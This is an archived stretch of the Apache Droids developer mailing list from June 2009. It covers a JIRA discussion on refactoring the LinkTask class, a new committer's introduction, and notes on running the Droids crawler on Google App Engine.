private String anchorText; private int weight; {code} Suggested change: {code} public class LinkTask extends HashMap<String, Serializable> or public class LinkTask extends HashMap<String, Serializable> implements Link {code} The minimum required attributes are: - final ? id, - mainly to have a minimum size value as hash key and store in memory/data grid for lookup, e.g. for use as history to avoid duplicated fetching. refer to DROIDS-53 - final String url - the original String representation of the URL (preferred), or java.net.URI representation with the encoded string (seems no good). - the url is the original one provided by the user in construction. two diff url may refer to the same url, e.g. http://www.apache.org and http://www.apache.org/, it's up to the user to decide if they should be normalized. (and they could use the URL/LinkNormalizer in DROIDS-45 the other fields are basically optional. - started/taskDate, if the queue use it for sorting, then it's useful, otherwise, it's just for logging. - "weight" is another example that not all implementation may need. - "linksTo", a.k.a. outLinks, is also optional to be attached to the LinkTask. an implementation may extract the outlink and put them in queue directly without storing the outlinks in the LinkTask. - "from", a.k.a. referrer, should not store the Link reference as it will affect GC. btw, should we also simplify Link, Task and LinkTask? if we use a Map, it's very generic already. Link and Task could be different concepts if we need to use them separately. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jun 18 10:49:21 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16905 invoked from network); 18 Jun 2009 10:49:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 10:49:21 -0000 Received: (qmail 11623 invoked by uid 500); 18 Jun 2009 10:49:32 -0000 Delivered-To: [email protected] Received: (qmail 11596 invoked by uid 500); 18 Jun 2009 10:49:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11586 invoked by uid 99); 18 Jun 2009 10:49:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 10:49:32 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 10:49:29 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D71A9234C1E6 for <[email protected]>; Thu, 18 Jun 2009 03:49:07 -0700 (PDT) Message-ID: <1075384095.1245322147880.JavaMail.jira@brutus> Date: Thu, 18 Jun 2009 03:49:07 -0700 (PDT) From: "Thorsten Scherler (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (DROIDS-54) Make LinkTask supports arbitrary data by extends HashMap, and consider to refactor Task, Link, and LinkTask In-Reply-To: <322507187.1245320947932.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-54?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12721178#action_12721178 ] Thorsten Scherler commented on DROIDS-54: ----------------------------------------- I agree to simplify Link, Task and LinkTask since the extra information that we need for task can now be stored in the map. > Make LinkTask supports arbitrary data by extends HashMap, and consider to refactor Task, Link, and LinkTask > ----------------------------------------------------------------------------------------------------------- > > Key: DROIDS-54 > URL: https://issues.apache.org/jira/browse/DROIDS-54 > Project: Droids > Issue Type: New Feature > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > > refer to the initial idea at: > https://issues.apache.org/jira/browse/DROIDS-48?focusedCommentId=12721121&page=com.atlassian.jira.plugin.system.issuetabpanels%3Acomment-tabpanel#action_12721121 > The current implementation of LinkTask > {code} > public class LinkTask implements Link, Serializable > { > private Date started; > private final int depth; > private final URI uri; > private final Link from; > > private Date lastModifedDate; > private Collection<URI> linksTo; > private String anchorText; > private int weight; > {code} > Suggested change: > {code} > public class LinkTask extends HashMap<String, Serializable> > or > public class LinkTask extends HashMap<String, Serializable> implements Link > {code} > The minimum required attributes are: > - final ? id, > - mainly to have a minimum size value as hash key and store in memory/data grid for lookup, e.g. for use as history to avoid duplicated fetching. refer to DROIDS-53 > - final String url > - the original String representation of the URL (preferred), or java.net.URI representation with the encoded string (seems no good). > - the url is the original one provided by the user in construction. two diff url may refer to the same url, e.g. http://www.apache.org and http://www.apache.org/, it's up to the user to decide if they should be normalized. (and they could use the URL/LinkNormalizer in DROIDS-45 > the other fields are basically optional. > - started/taskDate, if the queue use it for sorting, then it's useful, otherwise, it's just for logging. > - "weight" is another example that not all implementation may need. > - "linksTo", a.k.a. outLinks, is also optional to be attached to the LinkTask. an implementation may extract the outlink and put them in queue directly without storing the outlinks in the LinkTask. > - "from", a.k.a. referrer, should not store the Link reference as it will affect GC. > btw, should we also simplify Link, Task and LinkTask? if we use a Map, it's very generic already. Link and Task could be different concepts if we need to use them separately. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jun 18 10:51:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17265 invoked from network); 18 Jun 2009 10:51:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 10:51:18 -0000 Received: (qmail 12613 invoked by uid 500); 18 Jun 2009 10:51:29 -0000 Delivered-To: [email protected] Received: (qmail 12576 invoked by uid 500); 18 Jun 2009 10:51:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12566 invoked by uid 99); 18 Jun 2009 10:51:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 10:51:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 10:51:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 9D55D234C4A9 for <[email protected]>; Thu, 18 Jun 2009 03:51:07 -0700 (PDT) Message-ID: <779875001.1245322267643.JavaMail.jira@brutus> Date: Thu, 18 Jun 2009 03:51:07 -0700 (PDT) From: "Mingfai Ma (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (DROIDS-54) Make LinkTask supports arbitrary data by extends HashMap, and consider to refactor Task, Link, and LinkTask In-Reply-To: <322507187.1245320947932.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-54?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Mingfai Ma updated DROIDS-54: ----------------------------- Attachment: SampleLink.java attached is a sample implementation for review - we still can make a LinkTask extend this base Link class, or just add more method to this class (and optionally change it to LinkTask) - it stores url as String, but the constructor always call new URI() to ensure the url string is valid in construction time. - stuff like toString, equals and hashCode maybe deleted in the final implementation. or change them to follow this project's standard. - a few convenient method are added, such as getHost(), getURI(), resolve(String) are added. for resolve, it's added just like the URI has a resolve method. using a LinkResolver with the same base URI could be slightly more efficient. for me, i am using a crawler derived from Droids, and I make the all usage of Link as <T extends Link>. e.g. LinkQueue<T extends Link> extends PriorityBlockingQueue<T>. This also could be considered. > Make LinkTask supports arbitrary data by extends HashMap, and consider to refactor Task, Link, and LinkTask > ----------------------------------------------------------------------------------------------------------- > > Key: DROIDS-54 > URL: https://issues.apache.org/jira/browse/DROIDS-54 > Project: Droids > Issue Type: New Feature > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Attachments: SampleLink.java > > > refer to the initial idea at: > https://issues.apache.org/jira/browse/DROIDS-48?focusedCommentId=12721121&page=com.atlassian.jira.plugin.system.issuetabpanels%3Acomment-tabpanel#action_12721121 > The current implementation of LinkTask > {code} > public class LinkTask implements Link, Serializable > { > private Date started; > private final int depth; > private final URI uri; > private final Link from; > > private Date lastModifedDate; > private Collection<URI> linksTo; > private String anchorText; > private int weight; > {code} > Suggested change: > {code} > public class LinkTask extends HashMap<String, Serializable> > or > public class LinkTask extends HashMap<String, Serializable> implements Link > {code} > The minimum required attributes are: > - final ? id, > - mainly to have a minimum size value as hash key and store in memory/data grid for lookup, e.g. for use as history to avoid duplicated fetching. refer to DROIDS-53 > - final String url > - the original String representation of the URL (preferred), or java.net.URI representation with the encoded string (seems no good). > - the url is the original one provided by the user in construction. two diff url may refer to the same url, e.g. http://www.apache.org and http://www.apache.org/, it's up to the user to decide if they should be normalized. (and they could use the URL/LinkNormalizer in DROIDS-45 > the other fields are basically optional. > - started/taskDate, if the queue use it for sorting, then it's useful, otherwise, it's just for logging. > - "weight" is another example that not all implementation may need. > - "linksTo", a.k.a. outLinks, is also optional to be attached to the LinkTask. an implementation may extract the outlink and put them in queue directly without storing the outlinks in the LinkTask. > - "from", a.k.a. referrer, should not store the Link reference as it will affect GC. > btw, should we also simplify Link, Task and LinkTask? if we use a Map, it's very generic already. Link and Task could be different concepts if we need to use them separately. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jun 18 11:14:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25759 invoked from network); 18 Jun 2009 11:14:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 11:14:20 -0000 Received: (qmail 38448 invoked by uid 500); 18 Jun 2009 11:14:31 -0000 Delivered-To: [email protected] Received: (qmail 38425 invoked by uid 500); 18 Jun 2009 11:14:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38415 invoked by uid 99); 18 Jun 2009 11:14:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 11:14:31 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-qy0-f179.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 11:14:21 +0000 Received: by qyk9 with SMTP id 9so1242069qyk.32 for <[email protected]>; Thu, 18 Jun 2009 04:14:00 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=8X4d3SWBRuU4nfVliJeZsyzQxNss3vttYlE9YyaruZA=; b=TM5cMFl9xj47GDPKV+jy1Rod8BrPzR4lf3BzBs+O2+RLTxaCmNMbkIJ2OCaz9HiL2U fknnjpj6xpmbYYgZthjoYGwex3em1wgpiy5CDkELzvt9xGDb6DxlVijnuHnVPka7SPUp L8YLPgMlsb9aNCOf0QjMUc2icdymcd1EyDznw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=Qb135ihKRU/nEIhd8PobOgNX3L9KxbSk6GhYIifzabuwNMUYJ4eJbKzJbbjxjolNCB 1xM3x/zFRecQygqTWXNz1nYrWWBXVagKOaiz4w54tTSYYUAh+OIxy2p62m7Bv6oD69Nt 6i+NQnHCl5/rXGZTKU87nvB9NbyhH89jcmWUQ= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id e17mr1283382vck.47.1245323640543; Thu, 18 Jun 2009 04:14:00 -0700 (PDT) Date: Thu, 18 Jun 2009 19:14:00 +0800 Message-ID: <[email protected]> Subject: Notes for running Droids in Google App Engine From: Mingfai <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016e64eabf4399abb046c9d81a7 X-Virus-Checked: Checked by ClamAV on apache.org --0016e64eabf4399abb046c9d81a7 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit hi, If in case anyone have interest to run a crawler in Google App Engine, note the following: - GAE doesn't support thread. So the task master of a GAE Droids will work in a significantly different way. There won't be any single thread or multiple thread task master as GAE doesn't support any long running process. - so any unit of works, such as poll a link from queue, fetching, parsing etc has to be triggered by HTTP request. the free version has may have a 20 cron jobs a day. without an external trigger, one probably want a "chained http request" that let a cron job to call an URLs that call multiple URLs in async manner to trigger multiple jobs. The whole design has to consider the general quota limitation for optimization. e.g. max http fetch per mins, bandwidth etc. - Every HTTP request may last for as long as 30s, and subject to other limitation such as the stack in heap can't be larger than 1M, support only HTTP and HTTPS etc. So, if a page takes longer than 30s to download, there is no chance to process that page. for parsing and extraction, i suppose it could be done within 30s. - GAE doesn't support socket. So Apache HttpClient cannot be used. (unless anyone know how to override just the connection code) but it's ok to depend on HttpEntity as we could construct a HttpEntity with inputstream or byte[] I think it would be good for us to separate any thread and socket/httpclient related code and allow people to extend our class to run a Droid in GAE. regards, mingfai --0016e64eabf4399abb046c9d81a7-- From [email protected] Fri Jun 19 05:58:00 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85235 invoked from network); 19 Jun 2009 05:58:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2009 05:58:00 -0000 Received: (qmail 98412 invoked by uid 500); 19 Jun 2009 05:58:11 -0000 Delivered-To: [email protected] Received: (qmail 98361 invoked by uid 500); 19 Jun 2009 05:58:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98335 invoked by uid 99); 19 Jun 2009 05:58:04 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 05:58:04 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mo-p05-ob.rzone.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 05:57:53 +0000 X-RZG-AUTH: :I3wBe1Onbu02NkHlDbrpfe8kNG+qAh4Y0eqmCwRzFEVCdcWSt53pNQGNNbyKQR2V X-RZG-CLASS-ID: mo05 Received: from [161.129.204.104] (107.Red-88-16-255.dynamicIP.rima-tde.net [161.129.204.104]) by post.strato.de (fruni mo7) (RZmta 18.42) with ESMTP id 6057f3l5J4KcEr for <[email protected]>; Fri, 19 Jun 2009 07:57:32 +0200 (MEST) Subject: Re: svn commit: r786367 - /incubator/droids/trunk/docs/changes.html From: Thorsten Scherler <[email protected]> To: [email protected] In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=utf-8 Date: Fri, 19 Jun 2009 07:57:33 +0200 Message-Id: <1245391053.8766.1.camel@kenny> Mime-Version: 1.0 X-Mailer: Evolution 161.129.204.104 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org On Fri, 2009-06-19 at 04:16 +0000, [email protected] wrote: > Author: mingfai > Date: Fri Jun 19 04:16:00 2009 > New Revision: 786367 > > URL: http://svn.apache.org/viewvc?rev=786367&view=rev Welcome as first droids committer coming from the "outside" of apache. :) salu2 -- Thorsten Scherler <thorsten.at.apache.org> Open Source <consulting, training and solutions> From [email protected] Fri Jun 19 06:08:17 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97807 invoked from network); 19 Jun 2009 06:08:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2009 06:08:17 -0000 Received: (qmail 15791 invoked by uid 500); 19 Jun 2009 06:08:28 -0000 Delivered-To: [email protected] Received: (qmail 15751 invoked by uid 500); 19 Jun 2009 06:08:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15741 invoked by uid 99); 19 Jun 2009 06:08:28 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 06:08:28 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO qw-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 06:08:15 +0000 Received: by qw-out-1920.google.com with SMTP id 9so881421qwj.54 for <[email protected]>; Thu, 18 Jun 2009 23:07:54 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=cYodCahSmq1SjFL9pdy2Q/Lpchl+PVnnNqU8mlrnBKE=; b=Rqa6WCH7dSMGggPhqDVJCb4oJSxXZbHYCrhqvzQjelNWF6vfRz39iphWz9cYVkYMIo 6/TI3tksx5uunT7AiqwXlJTWJgFN1P54OY7iwYUJwU0A8dqiuo6J0X5krFJ2lsUuTQdf nOYlMROkcGQ09Cosl8Wtkj00mr7p4MDbISDqI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=pRpLcj8kZBY3EJJaweO9rRzliz34RkrT9BetI6LQVygYHpMW4HgzyVNNcGvfnTmLiB okhw2fNb2U0LXJCxYYdoQbSqNHSbmbcbX8W1qQ8J6NVgY8zEVmNG5NKDZGJ18vGyYx5z cj3KZa9OjCElDj9V+oAF+yw/7G8EECEErcJ3w= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id f11mr2223040vck.66.1245391674623; Thu, 18 Jun 2009 23:07:54 -0700 (PDT) In-Reply-To: <[email protected]> References: <1244185006.14878.4.camel@kenny> <[email protected]> <[email protected]> Date: Fri, 19 Jun 2009 14:07:54 +0800 Message-ID: <[email protected]> Subject: Re: [Vote] Mingfai Ma as committer From: Mingfai <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016e64b9ada5f4855046cad58b3 X-Virus-Checked: Checked by ClamAV on apache.org --0016e64b9ada5f4855046cad58b3 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Thank you for the invitation and voting. Let me briefly introduce myself. First of all, "Mingfai Ma" is a male name! :-) My full name is "Ming Fai, Ma" that "Ming Fai" is the first name, but many foreigners mistakenly think I'm "Ming, Fai Ma" (sth like that) so I just use "Mingfai Ma" now to avoid confusion. I'm from a native Chinese from Hong Kong, has been a Java developer since 2000, and now workng on my startup. And I also run the Hong Kong Java User Group. In case any of you know any Apache committer or activist who may travel to HK, let me know so I could invite him to speak on his project. re. Droids, my interest in web crawler rooted from around 2002/3 when I first wrote my own crawler. (and that was crap ...) my current project needs a focused crawler, and I found Droids more suitable for my use than those full search engine crawler or archiving crawler. For sure Droids is not too mature yet, so when I'm using it, I've basically write my own crawler from scretch base on some Droids' concepts. :-) Up to now, I've mainly proposed some small changes and I will make some bigger change proposal later on. as long as you guys accept, I could contribute anything back. btw, I'm just testing my account and try to update the "changes" page to add myself to the committer list and it seems the xdoc for the changes page is missing in the svn *[1] ?! for testing purpose, i've upated the /docs/changes.html *[2] in svn by hand and the change will be overriden anyway. regards, mingfai [1] - https://svn.apache.org/repos/asf/incubator/droids/trunk/src/documentation/content/xdocs/ [2] - https://svn.apache.org/repos/asf/incubator/droids/trunk/docs/changes.html | http://incubator.apache.org/droids/changes.html On Sun, Jun 14, 2009 at 9:28 AM, Grant Ingersoll <[email protected]>wrote: > This has passed, AFAICT. > > Mingfai, can you send in a CLA. See > http://www.apache.org/dev/new-committers-guide.html Once that is in, I > can request an account for you and get you SVN access. > > Also, as is often tradition in Lucene land, a little intro about who you > are is always nice. > > -Grant > > > On Jun 5, 2009, at 10:12 AM, Otis Gospodnetic wrote: > > >> +1 :) >> >> Otis >> >> >> >> >> ----- Original Message ---- >> >>> From: Thorsten Scherler <[email protected]> >>> To: [email protected] >>> Sent: Friday, June 5, 2009 2:56:46 AM >>> Subject: [Vote] Mingfai Ma as committer >>> >>> The droids pmc proposes Mingfai Ma to become a new committer. >>> >>> (S)he has >>> offered great contributions follows them through with the feeback given >>> from the developers. >>> >>> >>> https://issues.apache.org/jira/secure/IssueNavigator.jspa?reset=true&reporterSelect=specificuser&reporter=mingfai >>> >>> Please cast your votes. The voting period will end a week from today. >>> >>> >>> http://www.timeanddate.com/counters/customcounter.html?year=2009&month=06&day=12 >>> >>> salu2 >>> -- >>> Thorsten Scherler >>> Open Source >>> >> >> > > --0016e64b9ada5f4855046cad58b3-- From [email protected] Fri Jun 19 17:21:03 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39730 invoked from network); 19 Jun 2009 17:21:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2009 17:21:02 -0000 Received: (qmail 17471 invoked by uid 500); 19 Jun 2009 17:21:13 -0000 Delivered-To: [email protected] Received: (qmail 17424 invoked by uid 500); 19 Jun 2009 17:21:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 17414 invoked by uid 99); 19 Jun 2009 17:21:13 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 17:21:13 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO qw-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 17:21:02 +0000 Received: by qw-out-1920.google.com with SMTP id 9so1042471qwj.54 for <[email protected]>; Fri, 19 Jun 2009 10:20:41 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=rbDeFpG2/UAmntVAUK0Nf9U/CssFwge9Br0gVZW/D1M=; b=aIJ14HvQbOX0gvMyiuOb7ZuvCChG2tOx4Z4SQcAkIfnlSo6bsIuyiwtj7216AYu3+g 9tYeD7zho/QrVYr8XJV0m4fvkN3A3/Ypaco2SWk9Qj0XIL5PRg7Jip/JC+6urzbwvqPn XU0WVrE9JEPis+UK0iOO2hQ47caGpvBZoA2+c= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=BurDOWoOcoKeqzPSsL7v+k18t76dCExzK28lyQvLrgvplEnSz6RD7zlo7O56ZfPYrb BBLNbEqt0C24kXlpz1lvCSxpy197nmb5f+68TEwDtW91dnEF6PHeCXTdaVlWpKjpo8kn QuMWfhiyfdTrAvbT5+ggl5sjKf76mzZqPYRsA= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id z16mr2940534vcj.1.1245432038676; Fri, 19 Jun 2009 10:20:38 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Sat, 20 Jun 2009 01:20:38 +0800 Message-ID: <[email protected]> Subject: Re: Notes for running Droids in Google App Engine From: Mingfai <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016e6471b9a429334046cb6bee5 X-Virus-Checked: Checked by ClamAV on apache.org --0016e6471b9a429334046cb6bee5 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit On Thu, Jun 18, 2009 at 7:14 PM, Mingfai <[email protected]> wrote: > hi, > > If in case anyone have interest to run a crawler in Google App Engine, note > the following: > - GAE doesn't support thread. So the task master of a GAE Droids will work > in a significantly different way. There won't be any single thread or > multiple thread task master as GAE doesn't support any long running process. > > - so any unit of works, such as poll a link from queue, fetching, parsing > etc has to be triggered by HTTP request. the free version has may have a 20 > cron jobs a day. without an external trigger, one probably want a "chained > http request" that let a cron job to call an URLs that call multiple URLs in > async manner to trigger multiple jobs. The whole design has to consider the > general quota limitation for optimization. e.g. max http fetch per mins, > bandwidth etc. > > - Every HTTP request may last for as long as 30s, and subject to other > limitation such as the stack in heap can't be larger than 1M, support only > HTTP and HTTPS etc. So, if a page takes longer than 30s to download, there > is no chance to process that page. for parsing and extraction, i suppose it > could be done within 30s. > > - GAE doesn't support socket. So Apache HttpClient cannot be used. (unless > anyone know how to override just the connection code) but it's ok to depend > on HttpEntity as we could construct a HttpEntity with inputstream or byte[] > > I think it would be good for us to separate any thread and > socket/httpclient related code and allow people to extend our class to run a > Droid in GAE. > > regards, > mingfai > My GAE experiments results as a meaningful use case (and implementation). Especially for "processing" crawler that i presume the bottleneck is at the CPU and RAM of your server farm, we could utilize Google's processing power and connectivity to do content extraction from a page, or image processing. It works like this: - we deploy an app to GAE that - expose a http remoting interface (sth like RMI over HTTP), e.g. public Serializable extract( String url ); public Set<Link> extract( LinkTask link, Parser parser ); // any arg and return value has to be serializable for sure - the interface does every processing intersive works including fetching the page, parse it (it is usually the most CPU consuming process), and extract elements from a page. And return the extracted elements. - For me, I use Spring's Http Invoker. It takes just a few line of configuration to enable a normal Java service to be remotely accessible - Take an example, it takes 400ms to fetch the apache.org homepage, parse with NekoHtmlParser and extract all out links in GAE. - in our main crawler/droids - the worker instead of sending http request to the actual destination, it calls the remoting api in our GAE app, pass in the URL and get the extracted data. - so main task/link queue is still maintained in our local app. this is sth cannot be done in GAE until it supports some kind of Task Queue (which the beta is available for its Python environment already) - With Spring, we could switch from a local invocation to a remote http inocation just by configuration. It's quite interesting and useful to me. Every Google Account (with unique mobile phone number) can have 10 apps, each app may handle 3k call per min (continously for around 3.5hrs to use up the daily quota). besides, there are other advantages: - The requests come from Google's IP, so websites are less likely to broken your crawler. - faster connectivity means better throughput. the crawler won't need to spawn a lot of waiting threads to utilize bandwidth - unlimited scalability to utilize GAE, Droids has to be refactored in a way that the fetch-parse-extraction code be refactored to an isolated interface, without using HttpClient. It's much easier to use Spring. If anyone want to try that, I could create a DroidsWebService(s) module. Regards, mingfai [1] - http://daniel.gredler.net/2008/01/07/java-remoting-protocol-benchmarks/ [2] - http://static.springframework.org/spring/docs/3.0.x/spring-framework-reference/html/ch21s04.html --0016e6471b9a429334046cb6bee5-- From [email protected] Fri Jun 19 17:37:43 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53049 invoked from network); 19 Jun 2009 17:37:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Jun 2009 17:37:43 -0000 Received: (qmail 37803 invoked by uid 500); 19 Jun 2009 17:37:54 -0000 Delivered-To: [email protected] Received: (qmail 37758 invoked by uid 500); 19 Jun 2009 17:37:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37748 invoked by uid 99); 19 Jun 2009 17:37:54 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 17:37:54 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gx0-f206.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Jun 2009 17:37:45 +0000 Received: by gxk2 with SMTP id 2so2691309gxk.12 for <[email protected]>; Fri, 19 Jun 2009 10:37:24 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:from:to :in-reply-to:content-type:content-transfer-encoding:mime-version :subject:date:references:x-mailer; 